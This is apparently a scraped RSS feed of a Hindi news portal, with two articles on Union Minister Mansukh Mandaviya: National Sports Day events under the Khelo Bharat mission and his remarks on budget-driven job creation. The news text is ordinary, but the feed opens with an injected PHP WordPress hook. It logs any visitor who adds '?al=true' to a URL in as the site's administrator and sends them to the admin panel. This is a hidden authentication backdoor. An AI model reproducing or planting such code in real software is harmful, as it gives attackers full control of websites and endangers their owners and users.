// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Minister Mansukh Mandaviya – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 20 Aug 2025 07:56:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 रायपुर : खेलो भारत मिशन के तहत राष्ट्रीय खेल दिवस पर होगा विविध कार्यक्रम का आयोजन https://pratyushaashakinayikiran.com/?p=179293 Wed, 20 Aug 2025 07:56:00 +0000 https://pratyushaashakinayikiran.com/?p=179293 रायपुर : खेलो भारत मिशन के तहत राष्ट्रीय खेल दिवस पर होगा विविध कार्यक्रम का आयोजन

रायपुर में राष्ट्रीय खेल दिवस: खेलो भारत मिशन के तहत रंगारंग कार्यक्रमों का आयोजन

खेलो भारत मिशन: 29 अगस्त को होगा शुभारंभ, 31 अगस्त को होगा संडे ऑन साईकल

रायपुर

राष्ट्रीय खेल दिवस 29 से 31अगस्त तक पूरे देश में खेल और फिटनेस को बढ़ावा देने के लिए भव्य कार्यक्रमों का आयोजन किया जा रहा है। खेलो भारत मिशन के अंतर्गत यह आयोजन खेल संस्कृति को जन-जन तक पहुँचाने और ओलंपिक 2036 की तैयारियों को मजबूती देने की दिशा में एक महत्वपूर्ण कदम माना जा रहा है। इस संबंध में आज केंद्रीय खेल मंत्री मनसुख मंडाविया ने वीडियो कॉन्फ्रेंसिंग के माध्यम से सभी राज्यों के खेल मंत्रियों को आवश्यक दिशा निर्देश दिए। 

     राष्ट्रीय स्तर पर सभी स्कूल, कॉलेज और बड़े स्टेडियम में खेल गतिविधियाँ आयोजित की जाएँगी। खेल मंत्री टंक राम वर्मा ने कहा कि इस खेल महोत्सव के जरिए खेल भावना का संदेश दिया जाएगा। उन्होंने कहा कि यह आयोजन सिर्फ खेल भावना को जगाने का प्रयास नहीं, बल्कि भारत को खेल महाशक्ति बनाने की दिशा में ठोस कदम है।

     राज्य के सभी जिलों में 29 से 31 अगस्त तक विभिन्न खेलों का आयोजन किया जाएगा। संडे ऑन साईकल अभियान चलाया जाएगा, जिसमें आम नागरिक और खिलाड़ी एक घंटे खेल मैदान या साइकिल गतिविधि में शामिल होंगे। खेल आयोजन के लिए प्रत्येक जिले में एक नोडल अधिकारी की नियुक्ति की जाएगी। जिला मुख्यालय स्तर पर बड़े आयोजन होंगे, जिनमें जनप्रतिनिधियों और स्थानीय खिलाड़ियों की उपस्थिति रहेगी। समन्वय एवं मॉनिटरिंग के लिए फिट इंडिया पोर्टल  पर रिपोर्टिंग की व्यवस्था होगी। खेल कार्यक्रम 29 अगस्त की सुबह 7: 30 बजे हॉकी जादूगर ध्यानचंद जी को श्रद्धांजलि से प्रारंभ होगी। इसके साथ ही शपथ दिलाई जाएगी और खेल प्रतियोगिताओं का शुभारंभ होगा।

   इसी तरह 30 अगस्त को स्पिरिट ऑफ सप्पोर्टस थीम पर सेमिनार और सांस्कृतिक कार्यक्रम आयोजित होंगे। भारत ने 2036 ओलंपिक के आयोजन को लेकर भी तैयारी शुरू कर दी है। इसके लिए स्पोर्ट्स फेडरेशन और ओलंपिक एसोसिएशन को सशक्त किया जाएगा। खेलो इंडिया सेंटर को मजबूत करने पर जोर दिया जा रहा है। वन कॉर्पाेरेट वन स्पोर्ट्स मॉडल लागू किया जाएगा। खेल इन्फ्रास्ट्रक्चर को आधुनिक और मजबूत बनाने की दिशा में कार्य किया जाएगा।

]]>
‘पांच साल में चार करोड़ लोगों को मिलेगा रोजगार’-केंद्रीय मंत्री मनसुख मंडाविया https://pratyushaashakinayikiran.com/?p=55021 Sat, 27 Jul 2024 18:07:00 +0000 https://pratyushaashakinayikiran.com/?p=55021 रायपुर
 केंद्रीय मंत्री मनसुख मंडाविया शनिवार को एकदिवसीय दौरे पर रायपुर पहुंचे। यहां उन्होंने केंद्रीय बजट की सराहना करते हुए कहा प्रधानमंत्री नरेंद्र मोदी के तीसरे कार्यकाल का पहला बजट रोजगार बढ़ाने, मध्यम वर्ग का समर्थन करने और देश की अर्थव्यवस्था की विकास दर को बढ़ाने के उद्देश्य से है। मंडाविया ने कहा, "पीएम मोदी के नेतृत्व वाली सरकार तीसरी बार बनी है। यह पीएम मोदी के नेतृत्व वाली सरकार के तीसरे कार्यकाल के तहत पेश किया गया पहला बजट था। बजट का उद्देश्य रोजगार बढ़ाना, मध्यम वर्ग को समर्थन देना और देश की अर्थव्यवस्था की विकास दर को बढ़ाने के लिए एमएसएमई को प्रोत्साहित करना है।"

मंडाविया ने कहा- बजट में स्किल डवलेपमेंट पर फोकस किया गया है। उन्होंने कहा कि बजट में देश में कौशल विकास के लिए एक योजना शुरू की गई है। कौशल आज के भारत की आवश्यकता है। कई बार हम घर बनाते हैं तो हमें मिस्त्री नहीं मिलते हैं। घर बनाने के लिए प्लम्बर नहीं नहीं मिलते हैं। यह स्किल का क्षेत्र है। ऐसे में स्किल विकास पर फोकस किया गया है।

5 सालों में 4 करोड़ लोगों को रोजगार

केन्द्रीय मंत्री ने कहा कि स्किल डवलेपमेंट के जरिए हम रोजगार के नए अवसरों को पैदा करेंगे। शीर्ष कंपनियां अगले पांच वर्षों में एक करोड़ युवाओं को इंटर्नशिप प्रदान करेंगी, जिसमें प्रति माह 5,000 रुपये का इंटर्नशिप भत्ता होगा। 5 साल की अवधि में 4.1 करोड़ युवाओं के लिए रोजगार, कौशल और अन्य अवसरों की सुविधा प्रदान करेगा।" उन्होंने कहा कि रोजगार उपलब्ध कराने पीएम मोदी के सरकार की प्राथमिकता है।

लोगों के लिए है बजट

केंद्रीय मंत्री बजट संवाद कार्यक्रम में हिस्सा लेने के लिए रायपुर पहुंचे थे। इस दौरान उन्होंने कहा कि रोजगार के लिए सरकार द्वारा कई योजनाएं चलाई जा रही हैं। हब और स्पॉक के मॉडल से आईटीआई बनाई जाएगी। जिसके माध्यम से युवाओं की स्किल डेवलेप किया जाएगा। उन्होंने कहा कि हर क्षेत्र के लिए अलग-अलग क्लस्टर बनाया जाएगा। बजट की तारीफ करते हुए उन्होंने कहा कि सरकार का यह बजट किसानों और महिलाओं के लिए है।

]]>